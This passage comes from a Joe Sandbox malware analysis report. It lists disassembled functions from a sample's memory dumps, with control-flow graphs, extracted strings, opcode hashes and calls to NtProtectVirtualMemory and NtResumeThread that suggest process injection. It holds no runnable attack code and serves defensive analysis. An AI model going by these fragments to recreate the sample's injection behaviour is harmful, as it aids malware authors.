                                          • Snapshot File: hcaresult_0_2_69c0000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: ,aq$4$$]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q
                                          • API String ID: 0-3443518476
                                          • Opcode ID: bbe4d424fc2c8fa7367a086b6b928f64258f5778f36e97f636e14289a26805ea
                                          • Instruction ID: 2e85aa1b27134813baa69361752f5bd9cc1f93c1161f2e9e3877736af7b00013
                                          • Opcode Fuzzy Hash: bbe4d424fc2c8fa7367a086b6b928f64258f5778f36e97f636e14289a26805ea
                                          • Instruction Fuzzy Hash: 63B22874A00218CFDB54DFA9C984BADB7B6BF88710F248499E506AB3A5DB70EC41CF51
                                          Function 069CEBA7 Relevance: 8.0, Strings: 6, Instructions: 495COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3052621808.00000000069C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069C0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_69c0000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: ,aq$4$$]q$$]q$$]q$$]q
                                          • API String ID: 0-324474496
                                          • Opcode ID: 4b543630bbf60b77da0b1ea443a5c94d3a112dcc19cb78bbd7d135d2f54926ea
                                          • Instruction ID: bc056b3d62d89d9484ff112d2b531f24ad846b14fd31bc09dc78f1a47526b2af
                                          • Opcode Fuzzy Hash: 4b543630bbf60b77da0b1ea443a5c94d3a112dcc19cb78bbd7d135d2f54926ea
                                          • Instruction Fuzzy Hash: CE223B74A00618CFDB64DF68C984BADB7B6FF88314F1480A9E509AB7A5DB309D81CF51
                                          Function 06A239E8 Relevance: 6.0, Strings: 4, Instructions: 983COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 1181 6a239e8-6a23a09 1183 6a23a10-6a23af7 1181->1183 1184 6a23a0b 1181->1184 1186 6a241f9-6a24221 1183->1186 1187 6a23afd-6a23c3e 1183->1187 1184->1183 1190 6a24927-6a24930 1186->1190 1231 6a241c2-6a241ec 1187->1231 1232 6a23c44-6a23c9f 1187->1232 1192 6a24936-6a2494d 1190->1192 1193 6a2422f-6a24239 1190->1193 1195 6a24240-6a24334 1193->1195 1196 6a2423b 1193->1196 1214 6a24336-6a24342 1195->1214 1215 6a2435e 1195->1215 1196->1195 1216 6a24344-6a2434a 1214->1216 1217 6a2434c-6a24352 1214->1217 1218 6a24364-6a24384 1215->1218 1220 6a2435c 1216->1220 1217->1220 1222 6a24386-6a243df 1218->1222 1223 6a243e4-6a24464 1218->1223 1220->1218 1235 6a24924 1222->1235 1243 6a24466-6a244b9 1223->1243 1244 6a244bb-6a244fe 1223->1244 1245 6a241f6 1231->1245 1246 6a241ee 1231->1246 1240 6a23ca1 1232->1240 1241 6a23ca4-6a23caf 1232->1241 1235->1190 1240->1241 1242 6a240d7-6a240dd 1241->1242 1247 6a240e3-6a2415f 1242->1247 1248 6a23cb4-6a23cd2 1242->1248 1273 6a24509-6a24512 1243->1273 1244->1273 1245->1186 1246->1245 1289 6a241ac-6a241b2 1247->1289 1249 6a23cd4-6a23cd8 1248->1249 1250 6a23d29-6a23d3e 1248->1250 1249->1250 1253 6a23cda-6a23ce5 1249->1253 1255 6a23d40 1250->1255 1256 6a23d45-6a23d5b 1250->1256 1257 6a23d1b-6a23d21 1253->1257 1255->1256 1260 6a23d62-6a23d79 1256->1260 1261 6a23d5d 1256->1261 1264 6a23d23-6a23d24 1257->1264 1265 6a23ce7-6a23ceb 1257->1265 1262 6a23d80-6a23d96 1260->1262 1263 6a23d7b 1260->1263 1261->1260 1269 6a23d98 1262->1269 1270 6a23d9d-6a23da4 1262->1270 1263->1262 1272 6a23da7-6a23e12 1264->1272 1267 6a23cf1-6a23d09 1265->1267 1268 6a23ced 1265->1268 1274 6a23d10-6a23d18 1267->1274 1275 6a23d0b 1267->1275 1268->1267 1269->1270 1270->1272 1276 6a23e26-6a23fdb 1272->1276 1277 6a23e14-6a23e20 1272->1277 1279 6a24572-6a24581 1273->1279 1274->1257 1275->1274 1287 6a2403f-6a24054 1276->1287 1288 6a23fdd-6a23fe1 1276->1288 1277->1276 1280 6a24583-6a2460b 1279->1280 1281 6a24514-6a2453c 1279->1281 1316 6a24784-6a24790 1280->1316 1282 6a24543-6a2456c 1281->1282 1283 6a2453e 1281->1283 1282->1279 1283->1282 1293 6a24056 1287->1293 1294 6a2405b-6a2407c 1287->1294 1288->1287 1295 6a23fe3-6a23ff2 1288->1295 1291 6a24161-6a241a9 1289->1291 1292 6a241b4-6a241ba 1289->1292 1291->1289 1292->1231 1293->1294 1296 6a24083-6a240a2 1294->1296 1297 6a2407e 1294->1297 1299 6a24031-6a24037 1295->1299 1304 6a240a4 1296->1304 1305 6a240a9-6a240c9 1296->1305 1297->1296 1302 6a23ff4-6a23ff8 1299->1302 1303 6a24039-6a2403a 1299->1303 1306 6a24002-6a24023 1302->1306 1307 6a23ffa-6a23ffe 1302->1307 1310 6a240d4 1303->1310 1304->1305 1308 6a240d0 1305->1308 1309 6a240cb 1305->1309 1312 6a24025 1306->1312 1313 6a2402a-6a2402e 1306->1313 1307->1306 1308->1310 1309->1308 1310->1242 1312->1313 1313->1299 1318 6a24610-6a24619 1316->1318 1319 6a24796-6a247f1 1316->1319 1320 6a24622-6a24778 1318->1320 1321 6a2461b 1318->1321 1334 6a247f3-6a24826 1319->1334 1335 6a24828-6a24852 1319->1335 1339 6a2477e 1320->1339 1321->1320 1323 6a246b2-6a246f2 1321->1323 1324 6a246f7-6a24737 1321->1324 1325 6a24628-6a24668 1321->1325 1326 6a2466d-6a246ad 1321->1326 1323->1339 1324->1339 1325->1339 1326->1339 1343 6a2485b-6a248ee 1334->1343 1335->1343 1339->1316 1347 6a248f5-6a24915 1343->1347 1347->1235
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3052795411.0000000006A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A20000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6a20000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: TJbq$Te]q$paq$xb`q
                                          • API String ID: 0-4160082283
                                          • Opcode ID: 6b3d8b07b45662857ad70f72bde528841a1ca4765dfd21bcb56bcf716d490248
                                          • Instruction ID: 4cd4b6aeb7e3de2eea851fd455dc7c0031887effd188d8003ebd37c1c59530b8
                                          • Opcode Fuzzy Hash: 6b3d8b07b45662857ad70f72bde528841a1ca4765dfd21bcb56bcf716d490248
                                          • Instruction Fuzzy Hash: 29A2A475E00228CFDB65DF69C984A99BBB2FF89304F1581E9D509AB325DB319E81CF40
                                          Function 06CE4260 Relevance: 4.4, Strings: 3, Instructions: 615COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 1349 6ce4260-6ce4281 1350 6ce4288-6ce4318 call 6ce4dc2 1349->1350 1351 6ce4283 1349->1351 1356 6ce431e-6ce435b 1350->1356 1351->1350 1358 6ce435d-6ce4368 1356->1358 1359 6ce436a 1356->1359 1360 6ce4374-6ce448f 1358->1360 1359->1360 1371 6ce44a1-6ce44cc 1360->1371 1372 6ce4491-6ce4497 1360->1372 1373 6ce4c98-6ce4cb4 1371->1373 1372->1371 1374 6ce4cba-6ce4cd5 1373->1374 1375 6ce44d1-6ce4634 call 6ce30b8 1373->1375 1386 6ce4646-6ce47db call 6ce09d8 call 6ce0758 1375->1386 1387 6ce4636-6ce463c 1375->1387 1399 6ce47dd-6ce47e1 1386->1399 1400 6ce4840-6ce484a 1386->1400 1387->1386 1401 6ce47e9-6ce483b 1399->1401 1402 6ce47e3-6ce47e4 1399->1402 1403 6ce4a71-6ce4a90 1400->1403 1404 6ce4b16-6ce4b81 1401->1404 1402->1404 1405 6ce484f-6ce4995 call 6ce30b8 1403->1405 1406 6ce4a96-6ce4ac0 1403->1406 1423 6ce4b93-6ce4bde 1404->1423 1424 6ce4b83-6ce4b89 1404->1424 1435 6ce4a6a-6ce4a6b 1405->1435 1436 6ce499b-6ce4a67 call 6ce30b8 1405->1436 1412 6ce4ac2-6ce4b10 1406->1412 1413 6ce4b13-6ce4b14 1406->1413 1412->1413 1413->1404 1426 6ce4c7d-6ce4c95 1423->1426 1427 6ce4be4-6ce4c7c 1423->1427 1424->1423 1426->1373 1427->1426 1435->1403 1436->1435
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3053373141.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6ce0000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: fbq$8$I?~n
                                          • API String ID: 0-378195606
                                          • Opcode ID: d3297f4e44e4c372f10beabbab25dcf29228f1ef273fff4db60504be288ed991
                                          • Instruction ID: dd4569a2f299068a82d8d13095c4ea1b13ce6b075cf5a3cfd02446b29450d24a
                                          • Opcode Fuzzy Hash: d3297f4e44e4c372f10beabbab25dcf29228f1ef273fff4db60504be288ed991
                                          • Instruction Fuzzy Hash: B852E675E002298FDBA4DF69C850BD9B7B1FF89300F5086AAD909A7355DB30AE85CF50
                                          Function 06A24CFA Relevance: 3.8, Strings: 2, Instructions: 1339COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 1819 6a24cfa-6a24d36 1820 6a24d38 1819->1820 1821 6a24d3d-6a24e5f 1819->1821 1820->1821 1825 6a24e83-6a24e8f 1821->1825 1826 6a24e61-6a24e77 1821->1826 1827 6a24e91 1825->1827 1828 6a24e96-6a24e9b 1825->1828 2103 6a24e7d call 6a27888 1826->2103 2104 6a24e7d call 6a27898 1826->2104 1827->1828 1830 6a24ed3-6a24f1c 1828->1830 1831 6a24e9d-6a24ea9 1828->1831 1839 6a24f23-6a251e8 1830->1839 1840 6a24f1e 1830->1840 1832 6a24eb0-6a24ece 1831->1832 1833 6a24eab 1831->1833 1835 6a26637-6a2663d 1832->1835 1833->1832 1836 6a26668 1835->1836 1837 6a2663f-6a2665f 1835->1837 1837->1836 1866 6a25c18-6a25c24 1839->1866 1840->1839 1867 6a25c2a-6a25c62 1866->1867 1868 6a251ed-6a251f9 1866->1868 1877 6a25d3c-6a25d42 1867->1877 1869 6a25200-6a25325 1868->1869 1870 6a251fb 1868->1870 1905 6a25327-6a2535f 1869->1905 1906 6a25365-6a253ee 1869->1906 1870->1869 1878 6a25c67-6a25ce4 1877->1878 1879 6a25d48-6a25d80 1877->1879 1894 6a25ce6-6a25cea 1878->1894 1895 6a25d17-6a25d39 1878->1895 1889 6a260de-6a260e4 1879->1889 1892 6a25d85-6a25f87 1889->1892 1893 6a260ea-6a26132 1889->1893 1986 6a26026-6a2602a 1892->1986 1987 6a25f8d-6a26021 1892->1987 1900 6a26134-6a261a7 1893->1900 1901 6a261ad-6a261f8 1893->1901 1894->1895 1899 6a25cec-6a25d14 1894->1899 1895->1877 1899->1895 1900->1901 1924 6a26601-6a26607 1901->1924 1905->1906 1933 6a253f0-6a253f8 1906->1933 1934 6a253fd-6a25481 1906->1934 1926 6a261fd-6a2627f 1924->1926 1927 6a2660d-6a26635 1924->1927 1946 6a26281-6a2629c 1926->1946 1947 6a262a7-6a262b3 1926->1947 1927->1835 1936 6a25c09-6a25c15 1933->1936 1960 6a25483-6a2548b 1934->1960 1961 6a25490-6a25514 1934->1961 1936->1866 1946->1947 1949 6a262b5 1947->1949 1950 6a262ba-6a262c6 1947->1950 1949->1950 1952 6a262c8-6a262d4 1950->1952 1953 6a262d9-6a262e8 1950->1953 1956 6a265e8-6a265fe 1952->1956 1957 6a262f1-6a265c9 1953->1957 1958 6a262ea 1953->1958 1956->1924 1996 6a265d4-6a265e0 1957->1996 1958->1957 1962 6a263e2-6a2644b 1958->1962 1963 6a26450-6a264b9 1958->1963 1964 6a262f7-6a26334 1958->1964 1965 6a26365-6a263dd 1958->1965 1966 6a264be-6a26526 1958->1966 1960->1936 2009 6a25523-6a255a7 1961->2009 2010 6a25516-6a2551e 1961->2010 1962->1996 1963->1996 1991 6a2633e-6a26360 1964->1991 1965->1996 1998 6a2659a-6a265a0 1966->1998 1988 6a26087-6a260c4 1986->1988 1989 6a2602c-6a26085 1986->1989 2011 6a260c5-6a260db 1987->2011 1988->2011 1989->2011 1991->1996 1996->1956 2002 6a265a2-6a265ac 1998->2002 2003 6a26528-6a26586 1998->2003 2002->1996 2014 6a26588 2003->2014 2015 6a2658d-6a26597 2003->2015 2024 6a255b6-6a2563a 2009->2024 2025 6a255a9-6a255b1 2009->2025 2010->1936 2011->1889 2014->2015 2015->1998 2031 6a25649-6a256cd 2024->2031 2032 6a2563c-6a25644 2024->2032 2025->1936 2038 6a256cf-6a256d7 2031->2038 2039 6a256dc-6a25760 2031->2039 2032->1936 2038->1936 2045 6a25762-6a2576a 2039->2045 2046 6a2576f-6a257f3 2039->2046 2045->1936 2052 6a25802-6a25886 2046->2052 2053 6a257f5-6a257fd 2046->2053 2059 6a25895-6a25919 2052->2059 2060 6a25888-6a25890 2052->2060 2053->1936 2066 6a2591b-6a25923 2059->2066 2067 6a25928-6a259ac 2059->2067 2060->1936 2066->1936 2073 6a259bb-6a25a3f 2067->2073 2074 6a259ae-6a259b6 2067->2074 2080 6a25a41-6a25a49 2073->2080 2081 6a25a4e-6a25ad2 2073->2081 2074->1936 2080->1936 2087 6a25ae1-6a25b65 2081->2087 2088 6a25ad4-6a25adc 2081->2088 2094 6a25b67-6a25b6f 2087->2094 2095 6a25b74-6a25bf8 2087->2095 2088->1936 2094->1936 2101 6a25c04-6a25c06 2095->2101 2102 6a25bfa-6a25c02 2095->2102 2101->1936 2102->1936 2103->1825 2104->1825
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3052795411.0000000006A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A20000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6a20000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: 2$$]q
                                          • API String ID: 0-351713980
                                          • Opcode ID: c27e295c22735f5815c4006a0aa970716a2e2b17d51ebfa0cf066fa4c88e40c6
                                          • Instruction ID: 0f62e34e71b050a29f449862e1e8540023ee20167bd5773dd51fc778198fef83
                                          • Opcode Fuzzy Hash: c27e295c22735f5815c4006a0aa970716a2e2b17d51ebfa0cf066fa4c88e40c6
                                          • Instruction Fuzzy Hash: 17E2E5B4E446288FCB64DF68D884B9ABBF2FB89301F1081E9D509A7355DB349E85CF50
                                          Function 06B51EF0 Relevance: 3.1, Strings: 2, Instructions: 554COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 2347 6b51ef0-6b51f0a 2348 6b51f16-6b51f22 2347->2348 2349 6b51f0c-6b51f13 2347->2349 2351 6b51f24-6b51f31 2348->2351 2352 6b51f7e-6b51f81 2348->2352 2359 6b51f37-6b51f67 2351->2359 2360 6b5214f-6b52187 2351->2360 2353 6b51f94-6b51f97 2352->2353 2354 6b51f83-6b51f85 2352->2354 2356 6b51fbd-6b51fc0 2353->2356 2357 6b51f99-6b51fb7 2353->2357 2358 6b51f8d 2354->2358 2361 6b52145-6b5214c 2356->2361 2362 6b51fc6-6b51fcc 2356->2362 2357->2356 2366 6b5218e-6b521d9 2357->2366 2358->2353 2390 6b51f74-6b51f77 2359->2390 2391 6b51f69-6b51f72 2359->2391 2360->2366 2362->2361 2364 6b51fd2-6b51fdb 2362->2364 2372 6b52013-6b52019 2364->2372 2373 6b51fdd-6b51fec 2364->2373 2395 6b52212-6b52214 2366->2395 2396 6b521db-6b521e8 2366->2396 2374 6b52124-6b5212a 2372->2374 2375 6b5201f-6b52028 2372->2375 2373->2372 2382 6b51fee-6b52007 2373->2382 2374->2361 2376 6b5212c-6b5213c 2374->2376 2375->2374 2385 6b5202e-6b5203a 2375->2385 2376->2361 2389 6b5213e-6b52143 2376->2389 2382->2372 2392 6b52009-6b5200c 2382->2392 2397 6b52040-6b52068 2385->2397 2398 6b520d8-6b5211c 2385->2398 2389->2361 2390->2352 2391->2352 2392->2372 2399 6b5265f-6b52666 2395->2399 2396->2395 2403 6b521ea-6b52210 2396->2403 2397->2398 2410 6b5206a-6b520a7 2397->2410 2398->2374 2403->2395 2414 6b52219-6b5224d 2403->2414 2410->2398 2422 6b520a9-6b520d6 2410->2422 2423 6b522f0-6b522ff 2414->2423 2424 6b52253-6b5225c 2414->2424 2422->2374 2430 6b52301-6b52317 2423->2430 2431 6b5233e 2423->2431 2425 6b52667-6b52677 2424->2425 2426 6b52262-6b52275 2424->2426 2435 6b52277-6b52290 2426->2435 2436 6b522de-6b522ea 2426->2436 2442 6b52337-6b5233c 2430->2442 2443 6b52319-6b52335 2430->2443 2434 6b52340-6b52345 2431->2434 2439 6b52347-6b52368 2434->2439 2440 6b52388-6b523a4 2434->2440 2435->2436 2452 6b52292-6b522a0 2435->2452 2436->2423 2436->2424 2439->2440 2456 6b5236a 2439->2456 2449 6b5246c-6b52475 2440->2449 2450 6b523aa-6b523b3 2440->2450 2442->2434 2443->2434 2453 6b5265d 2449->2453 2454 6b5247b 2449->2454 2450->2425 2455 6b523b9-6b523d6 2450->2455 2452->2436 2464 6b522a2-6b522a6 2452->2464 2453->2399 2457 6b524e6-6b524f4 2454->2457 2458 6b52482-6b52484 2454->2458 2459 6b52489-6b52497 2454->2459 2474 6b523dc-6b523f2 2455->2474 2475 6b5245a-6b52466 2455->2475 2460 6b5236d-6b52386 2456->2460 2467 6b524f6-6b524fe 2457->2467 2468 6b5250c-6b52523 2457->2468 2458->2399 2471 6b524af-6b524b6 2459->2471 2472 6b52499-6b524a1 2459->2472 2460->2440 2464->2425 2470 6b522ac-6b522c5 2464->2470 2467->2468 2482 6b52525-6b5252d 2468->2482 2483 6b5253b-6b5254e 2468->2483 2470->2436 2487 6b522c7-6b522db 2470->2487 2471->2399 2472->2471 2474->2475 2489 6b523f4-6b52402 2474->2489 2475->2449 2475->2450 2482->2483 2490 6b52566-6b52583 2483->2490 2491 6b52550-6b52558 2483->2491 2487->2436 2489->2475 2497 6b52404-6b52408 2489->2497 2502 6b52585-6b5258d 2490->2502 2503 6b5259b 2490->2503 2491->2490 2497->2425 2499 6b5240e-6b52437 2497->2499 2499->2475 2507 6b52439-6b52457 2499->2507 2502->2503 2503->2399 2507->2475
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3053144322.0000000006B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6b50000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: Pl]q$$]q
                                          • API String ID: 0-2369359564
                                          • Opcode ID: 4e90101c5e0d55661af8760d9aab71b4bde88055af9007d02b44b52a8d6530c2
                                          • Instruction ID: 43246282f39c5c867d2d6743a13e01299bdf10104c1de11df4c46e07d58c0531
                                          • Opcode Fuzzy Hash: 4e90101c5e0d55661af8760d9aab71b4bde88055af9007d02b44b52a8d6530c2
                                          • Instruction Fuzzy Hash: C1223674B012048FDB54DF28C994AAABBF2FF89710B1684A9E905CB375DB31ED42CB51
                                          Function 06CE4250 Relevance: 2.7, Strings: 2, Instructions: 170COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3053373141.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6ce0000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: fbq$h
                                          • API String ID: 0-3598783323
                                          • Opcode ID: 2d977fe7e17e5c9c4348c2fdf856b0f7b83f7f988b58863db24d947cf26857c2
                                          • Instruction ID: 7dafa60fb1a666db1d429fc3402d774d9a60cbced51a99eec423d7dcfd0c65e9
                                          • Opcode Fuzzy Hash: 2d977fe7e17e5c9c4348c2fdf856b0f7b83f7f988b58863db24d947cf26857c2
                                          • Instruction Fuzzy Hash: 4371F571E002299FDB64DF69D840BDAB7B2BF89300F50C2AAD509A7254DB306E85CF91
                                          Function 06E9E6C0 Relevance: 2.7, Strings: 2, Instructions: 156COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3053923386.0000000006E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E80000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6e80000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: Bv0s$T(u+
                                          • API String ID: 0-3775074207
                                          • Opcode ID: 8e94c4f38402a1bfff9171da0b39a7c7434601d452d09179bbc267ca5f5680f5
                                          • Instruction ID: 8008cf5eab7332520ee09ae2d6992febab7720007e0a5e4e06214058a026f42f
                                          • Opcode Fuzzy Hash: 8e94c4f38402a1bfff9171da0b39a7c7434601d452d09179bbc267ca5f5680f5
                                          • Instruction Fuzzy Hash: 42711974E40318DFDB94DF28D854BA9B7F2BF49300F5080A9E51AAB391DB359A85CF02
                                          Function 069CA20E Relevance: 1.6, Strings: 1, Instructions: 376COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3052621808.00000000069C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069C0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_69c0000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: Te]q
                                          • API String ID: 0-52440209
                                          • Opcode ID: 2d633e31781677a3e1a80d49bc624bc7693b3d31042f7162860aafea26dd1c6c
                                          • Instruction ID: 60dcd68961f723a265b40b909c5c64eb38035986660bca1e8bbac35fd56438fe
                                          • Opcode Fuzzy Hash: 2d633e31781677a3e1a80d49bc624bc7693b3d31042f7162860aafea26dd1c6c
                                          • Instruction Fuzzy Hash: FF022570E45218CFDBA4DF68C884B9DB7F2FB49310F6084AAD409A7655CB349E85CF52
                                          Function 06CE7720 Relevance: 1.6, APIs: 1, Instructions: 65nativeCOMMON
                                          Download Yara Rule
                                          APIs
                                          • NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 06CE77B1
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3053373141.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6ce0000_file.jbxd
                                          Similarity
                                          • API ID: MemoryProtectVirtual
                                          • String ID:
                                          • API String ID: 2706961497-0
                                          • Opcode ID: ca64a353f4fb905110a17b31a807ec79c720cdf2bc79e83811564166ab8a6342
                                          • Instruction ID: 8e0e01e473bbdd40c56c8e0c26ace3dcfcf16833c15d753a3620c0c8c0443856
                                          • Opcode Fuzzy Hash: ca64a353f4fb905110a17b31a807ec79c720cdf2bc79e83811564166ab8a6342
                                          • Instruction Fuzzy Hash: A021E7B5D013499FCB10DFAAD984AEEFBF5FF48310F20842AE919A7250C7759941CBA1
                                          Function 06CE7728 Relevance: 1.6, APIs: 1, Instructions: 63nativeCOMMON
                                          Download Yara Rule
                                          APIs
                                          • NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 06CE77B1
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3053373141.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6ce0000_file.jbxd
                                          Similarity
                                          • API ID: MemoryProtectVirtual
                                          • String ID:
                                          • API String ID: 2706961497-0
                                          • Opcode ID: 8b900cc0340daa535cc83eac881e3d67fc887a57c1a28959748b3bb8cd9dfef1
                                          • Instruction ID: b94e3c544f23d828dc1358841719f264edbc8f1c744a46236ac6a0e8c791724e
                                          • Opcode Fuzzy Hash: 8b900cc0340daa535cc83eac881e3d67fc887a57c1a28959748b3bb8cd9dfef1
                                          • Instruction Fuzzy Hash: 9321E6B5D013499FCB10DFAAD984ADEFBF5FF48310F20842AE519A7250C775A940CBA1
                                          Function 06CE9C88 Relevance: 1.6, APIs: 1, Instructions: 58nativethreadCOMMON
                                          Download Yara Rule
                                          APIs
                                          • NtResumeThread.NTDLL(?,?), ref: 06CE9CFE
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3053373141.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6ce0000_file.jbxd
                                          Similarity
                                          • API ID: ResumeThread
                                          • String ID:
                                          • API String ID: 947044025-0
                                          • Opcode ID: 72cae17044dcf9c768715e2a11a3224e4b4ca374674fdcb80fae75756ae4ba2d
                                          • Instruction ID: 126066027ee44072276099ebdecd02f041d9d7e816d56bb09c3470d752d1a1d7
                                          • Opcode Fuzzy Hash: 72cae17044dcf9c768715e2a11a3224e4b4ca374674fdcb80fae75756ae4ba2d
                                          • Instruction Fuzzy Hash: 2D1117B5D002098FCB20DFAAC4456EEFBF5FF48310F10842AD459A7240CB79A945CFA1
                                          Function 06CE9C90 Relevance: 1.6, APIs: 1, Instructions: 54nativethreadCOMMON
                                          Download Yara Rule
                                          APIs
                                          • NtResumeThread.NTDLL(?,?), ref: 06CE9CFE
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3053373141.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6ce0000_file.jbxd
                                          Similarity
                                          • API ID: ResumeThread
                                          • String ID:
                                          • API String ID: 947044025-0
                                          • Opcode ID: 1a43fc1b776e8a6184da3083fe81e40ae849785dacb8ca9b5bcc7c5fda806573
                                          • Instruction ID: 0ecb188e005a0cd9e73fe481918716f6a881683d28268d11b5d337d369da8677
                                          • Opcode Fuzzy Hash: 1a43fc1b776e8a6184da3083fe81e40ae849785dacb8ca9b5bcc7c5fda806573
                                          • Instruction Fuzzy Hash: 7B11F6B5D002098FDB10DFAAC884AEEFBF5FF48314F10842AD419A7240CB78A945CFA1
                                          Function 06CD3DB5 Relevance: 1.5, Strings: 1, Instructions: 261COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3053333600.0000000006CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CD0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6cd0000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: PH]q
                                          • API String ID: 0-3168235125
                                          • Opcode ID: 999f22ab7841e976cf048e5e14c7e9efe04160f30392bd566ff87cf273782fcb
                                          • Instruction ID: 31b1e9ec96dd8fd0179ddaef2bb6bc3d48ed1981130dd38c49e070658fddb527
                                          • Opcode Fuzzy Hash: 999f22ab7841e976cf048e5e14c7e9efe04160f30392bd566ff87cf273782fcb
                                          • Instruction Fuzzy Hash: E8C11870E44258CFEBA4DF99C884B9DBBF2FB49304F2080A9D609A7655D7749D84CF42
                                          Function 069C2080 Relevance: 1.5, Strings: 1, Instructions: 254COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3052621808.00000000069C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069C0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_69c0000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: Te]q
                                          • API String ID: 0-52440209
                                          • Opcode ID: 3cc07c2e58b202461a5d068b0888c94bd5f4d585d1f51884492abb047886d2a4
                                          • Instruction ID: 521eb19354967967c5b62f489078bf72964c5ec230fa19aef815c75b19b2bf5c
                                          • Opcode Fuzzy Hash: 3cc07c2e58b202461a5d068b0888c94bd5f4d585d1f51884492abb047886d2a4
                                          • Instruction Fuzzy Hash: 4DB12674E45208CFEBA4CFA9C984B9DBBF2BF48310F2080A9D519AB655DB345E85CF41
                                          Function 069C2090 Relevance: 1.5, Strings: 1, Instructions: 252COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3052621808.00000000069C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069C0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_69c0000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: Te]q
                                          • API String ID: 0-52440209
                                          • Opcode ID: c83267608f55c0459baed9f25a2af33b6c8bca5d7f13fb6ad7e7e8bae20203be
                                          • Instruction ID: 1ce4752ff8351d5ca524cf4f0bad465cbaa6eac7e31ebf9e11d83df7bbe2a800
                                          • Opcode Fuzzy Hash: c83267608f55c0459baed9f25a2af33b6c8bca5d7f13fb6ad7e7e8bae20203be
                                          • Instruction Fuzzy Hash: 91B13774E44208CFEBA4CFA9C984B9DBBF6BF49310F2080A9D419A7655D7345E85CF42
                                          Function 06A2666B Relevance: .5, Instructions: 539COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3052795411.0000000006A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A20000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6a20000_file.jbxd
                                          Similarity
                                          • API ID:
